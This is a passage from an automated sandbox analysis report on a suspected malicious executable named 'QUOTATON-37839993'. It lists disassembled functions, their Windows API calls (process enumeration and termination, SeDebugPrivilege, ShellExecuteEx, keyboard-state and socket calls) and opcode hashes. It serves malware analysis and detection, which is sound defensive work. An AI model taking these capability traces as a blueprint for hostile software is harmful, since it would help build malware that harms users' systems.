                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window_wcscat
                                                                      • String ID: SysListView32
                                                                      • API String ID: 307300125-78025650
                                                                      • Opcode ID: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
                                                                      • Instruction ID: 3b80253fdca9d53bf3c5415756a5fe7761ef2908750dd0bc53e8e8ef3771dcc9
                                                                      • Opcode Fuzzy Hash: 96cf89c14e0f483dbd72b326e99d8be8a64fd262b13895556a211325b3119c7b
                                                                      • Instruction Fuzzy Hash: 55419171A00348AFDB21AF64CC85BEEB7F8EF08354F10156AF68CB7291D6719D848B60
                                                                      Function 00E7E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00E63C7A
                                                                        • Part of subcall function 00E63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00E63C88
                                                                        • Part of subcall function 00E63C55: CloseHandle.KERNEL32(00000000), ref: 00E63D52
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9A4
                                                                      • GetLastError.KERNEL32 ref: 00E7E9B7
                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E7E9E6
                                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E7EA63
                                                                      • GetLastError.KERNEL32(00000000), ref: 00E7EA6E
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E7EAA3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                      • String ID: SeDebugPrivilege
                                                                      • API String ID: 2533919879-2896544425
                                                                      • Opcode ID: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
                                                                      • Instruction ID: 24ec945d0725ff5e0d730cb959cac5f42815737aa5f7d9c3d34fe1138b07fae9
                                                                      • Opcode Fuzzy Hash: cc6aaa3acce6bd3c40a4656be5d6caf6b71cd71f354fc33f04e0e2e41560e99a
                                                                      • Instruction Fuzzy Hash: AE418A712002009FDB14EF64CC95B6AB7E5AF84314F049458F90AAB3D3DB70A848CB91
                                                                      Function 00E62F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E63033
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: IconLoad
                                                                      • String ID: blank$info$question$stop$warning
                                                                      • API String ID: 2457776203-404129466
                                                                      • Opcode ID: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
                                                                      • Instruction ID: 86fde4b72344f71f0d705aeb31088e220817e9f7db8b32b83875515cee4919c8
                                                                      • Opcode Fuzzy Hash: 21cbcccc42824eab496c1a2665f49a9d81e147539ed0ab2dbd06363ccb85ffbc
                                                                      • Instruction Fuzzy Hash: 79112B31388346BEE7259A64FC42CEF779CDF253A4B20102EFA00B6282DB715F4856A4
                                                                      Function 00E642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00E64312
                                                                      • LoadStringW.USER32(00000000), ref: 00E64319
                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00E6432F
                                                                      • LoadStringW.USER32(00000000), ref: 00E64336
                                                                      • _wprintf.LIBCMT ref: 00E6435C
                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E6437A
                                                                      Strings
                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00E64357
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                      • API String ID: 3648134473-3128320259
                                                                      • Opcode ID: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
                                                                      • Instruction ID: 1bc15971d7786742e83483f7712fb7181ccfef8fb03040fb8fd7ec370c84e4d1
                                                                      • Opcode Fuzzy Hash: 3f789566a116ff4757182abfbdaabd9e0af036ff524130af4e2f54332771ab10
                                                                      • Instruction Fuzzy Hash: C90162F2940208BFE711A7A1DD89EFB776CEB08300F0005A1F749F2151EA749E894B70
                                                                      Function 00E8D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00E8D47C
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00E8D49C
                                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00E8D6D7
                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E8D6F5
                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E8D716
                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00E8D735
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E8D75A
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00E8D77D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                      • String ID:
                                                                      • API String ID: 1211466189-0
                                                                      • Opcode ID: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                                                                      • Instruction ID: bf24ed9281eeffc5b694d643eb9fcaf18493817df72b4ce0e900cf045bce22e0
                                                                      • Opcode Fuzzy Hash: 9c78382b0dc236520007a43add7f77e9afc3bdde62e5e881e187bd86788f0ed0
                                                                      • Instruction Fuzzy Hash: 0DB1BC31604219EFDF18DF69C985BAD7BB1FF04705F08906AEC4CAB295E731A990DB90
                                                                      Function 00E02A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E02ACF
                                                                      • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00E02B17
                                                                      • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C21A
                                                                      • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00E3C1C7,00000004,00000000,00000000,00000000), ref: 00E3C286
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ShowWindow
                                                                      • String ID:
                                                                      • API String ID: 1268545403-0
                                                                      • Opcode ID: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
                                                                      • Instruction ID: a0b2c1780fca89948ee272e7c6810a60e97d898c36f463318c4a6e8b1ded05a7
                                                                      • Opcode Fuzzy Hash: d9a17bc1bb242dfbda51f3ac58145bfad5670c768e107bd1f08316ad0cc8a5b8
                                                                      • Instruction Fuzzy Hash: B7410C317046809EDB359B298C8CBAB7FF1AB45318F24A81DE247B65F1CA75E8C5D720
                                                                      Function 00E670C6 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E670DD
                                                                        • Part of subcall function 00E20DB6: std::exception::exception.LIBCMT ref: 00E20DEC
                                                                        • Part of subcall function 00E20DB6: __CxxThrowException@8.LIBCMT ref: 00E20E01
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00E67114
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00E67130
                                                                      • _memmove.LIBCMT ref: 00E6717E
                                                                      • _memmove.LIBCMT ref: 00E6719B
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00E671AA
                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00E671BF
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E671DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 256516436-0
                                                                      • Opcode ID: 6d88c77c4d0671be5dfeffcda00d93a84e9f29a4624201e9cc5defc34ef3105b
                                                                      • Instruction ID: bb5cfbaa96c79f0d314734a612fb0760ad8589a6ee7ef1f56ff2cc5922c8e91b
                                                                      • Opcode Fuzzy Hash: 6d88c77c4d0671be5dfeffcda00d93a84e9f29a4624201e9cc5defc34ef3105b
                                                                      • Instruction Fuzzy Hash: 2A316D31900215EFCF00DFA5EC85AAFB7B8EF45710F1541A5E904BB296DB309E54CBA0
                                                                      Function 00E861D3 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00E861EB
                                                                      • GetDC.USER32(00000000), ref: 00E861F3
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E861FE
                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00E8620A
                                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00E86246
                                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00E86257
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00E8902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00E86291
                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00E862B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                      • String ID:
                                                                      • API String ID: 3864802216-0
                                                                      • Opcode ID: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
                                                                      • Instruction ID: 72e7a0084bc49c00c9ef710449ae8efbc6b63d9b6f3664fb4b07ad7466e2598c
                                                                      • Opcode Fuzzy Hash: e8122b1d5dc78226dd29ab5e4b699d8145b65da38832dd0018d0574ef3cd8cda
                                                                      • Instruction Fuzzy Hash: E1317F72101210BFEB119F51CC8AFEA3BADEF49765F0441A5FE0CAA1A2D6759C41CBA4
                                                                      Function 00E5BBAF Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memcmp
                                                                      • String ID:
                                                                      • API String ID: 2931989736-0
                                                                      • Opcode ID: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
                                                                      • Instruction ID: 6c73f52ab9528fda2a44051d531bad98fa0dcbea73af6c8d19268bbbc2cd47b3
                                                                      • Opcode Fuzzy Hash: 34b7a74105c44dfd9a2c30d668714be8e69cc167eba75b75a05f534091648057
                                                                      • Instruction Fuzzy Hash: 7F21F6616013197BEA047621AD42FFFB39C9E2034DF087824FE08B6647EB64DF19C1A5
                                                                      Function 00E6EB23 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                      • _wcstok.LIBCMT ref: 00E6EC94
                                                                      • _wcscpy.LIBCMT ref: 00E6ED23
                                                                      • _memset.LIBCMT ref: 00E6ED56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 774024439-3081909835
                                                                      • Opcode ID: ba48f481305f2694c1917396321c1a5fc4f4365b5173f11bb5e07b82df1fb13d
                                                                      • Instruction ID: f2e3b8aa7af3f28bf9b702d2458d73fc197f14c30f76d47b81cc863dba4dca07
                                                                      • Opcode Fuzzy Hash: ba48f481305f2694c1917396321c1a5fc4f4365b5173f11bb5e07b82df1fb13d
                                                                      • Instruction Fuzzy Hash: 2CC16C756083419FC714EF64D881A5AB7E4EF85354F00692DF999AB3E2DB30EC85CB82
                                                                      Function 00E76B03 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E76C00
                                                                      • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E76C21
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 00E76C34
                                                                      • htons.WSOCK32(?,?,?,00000000,?), ref: 00E76CEA
                                                                      • inet_ntoa.WSOCK32(?), ref: 00E76CA7
                                                                        • Part of subcall function 00E5A7E9: _strlen.LIBCMT ref: 00E5A7F3
                                                                        • Part of subcall function 00E5A7E9: _memmove.LIBCMT ref: 00E5A815
                                                                      • _strlen.LIBCMT ref: 00E76D44
                                                                      • _memmove.LIBCMT ref: 00E76DAD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                      • String ID:
                                                                      • API String ID: 3619996494-0
                                                                      • Opcode ID: 6966b3eb00625d707e607b0a0d8ecf713aacd1852ab2fec2d1672556b8142a5c
                                                                      • Instruction ID: cca5dc26c2e453a4dfe3fca367b9550ec203cd6f94f75b369ae0376b3b7ad615
                                                                      • Opcode Fuzzy Hash: 6966b3eb00625d707e607b0a0d8ecf713aacd1852ab2fec2d1672556b8142a5c
                                                                      • Instruction Fuzzy Hash: 8081B171204700AFD710EF24CC81E6BB7E8AF84718F54A919F659BB2D2DA70AD45CB52
                                                                      Function 00E01424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee25d155d852df949e231b5abf4a9a10cd534cef5ceb4c6a05e119da36b83936
                                                                      • Instruction ID: a03e723aafc658acb3e50a8f6c394b17b8dcfebecff97b563035effc40b74f53
                                                                      • Opcode Fuzzy Hash: ee25d155d852df949e231b5abf4a9a10cd534cef5ceb4c6a05e119da36b83936
                                                                      • Instruction Fuzzy Hash: 20715F30900119EFCB15DF99CC89AFEBB79FF85314F148199F915BA2A1C734AA91CB60
                                                                      Function 00E8B351 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindow.USER32(01014DD0), ref: 00E8B3EB
                                                                      • IsWindowEnabled.USER32(01014DD0), ref: 00E8B3F7
                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00E8B4DB
                                                                      • SendMessageW.USER32(01014DD0,000000B0,?,?), ref: 00E8B512
                                                                      • IsDlgButtonChecked.USER32(?,?), ref: 00E8B54F
                                                                      • GetWindowLongW.USER32(01014DD0,000000EC), ref: 00E8B571
                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00E8B589
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                      • String ID:
                                                                      • API String ID: 4072528602-0
                                                                      • Opcode ID: dd677e29cd716c8d6cb44d66e06b20ae1a616e501fd1c3a8b0c6c3143fe76801
                                                                      • Instruction ID: c39b18a118be84be05f540aa55dcb51f416bec30f80e665e32e5c8bf1523eaf8
                                                                      • Opcode Fuzzy Hash: dd677e29cd716c8d6cb44d66e06b20ae1a616e501fd1c3a8b0c6c3143fe76801
                                                                      • Instruction Fuzzy Hash: 1F71D134600604EFDB20AF55C896FBA7BB9EF09304F146069F95DB72A2D772AC81DB50
                                                                      Function 00E7F41E Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00E7F448
                                                                      • _memset.LIBCMT ref: 00E7F511
                                                                      • ShellExecuteExW.SHELL32(?), ref: 00E7F556
                                                                        • Part of subcall function 00E09837: __itow.LIBCMT ref: 00E09862
                                                                        • Part of subcall function 00E09837: __swprintf.LIBCMT ref: 00E098AC
                                                                        • Part of subcall function 00E1FC86: _wcscpy.LIBCMT ref: 00E1FCA9
                                                                      • GetProcessId.KERNEL32(00000000), ref: 00E7F5CD
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00E7F5FC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                      • String ID: @
                                                                      • API String ID: 3522835683-2766056989
                                                                      • Opcode ID: 242d4a7a59096a3662ffb30731683901895bcf51dfa90a2672f19143d4226e9b
                                                                      • Instruction ID: 5d624c4b2d2d916ad0b5dbc605ad3efc6e9fa9586b25d050aee7b41039ffbfb6
                                                                      • Opcode Fuzzy Hash: 242d4a7a59096a3662ffb30731683901895bcf51dfa90a2672f19143d4226e9b
                                                                      • Instruction Fuzzy Hash: A1617EB5A00619DFCB14DFA4C4859AEBBF5FF48314F149069E859BB392DB30AD81CB90
                                                                      Function 00E60F4D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 00E60F8C
                                                                      • GetKeyboardState.USER32(?), ref: 00E60FA1
                                                                      • SetKeyboardState.USER32(?), ref: 00E61002
                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00E61030
                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00E6104F
                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00E61095
                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00E610B8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
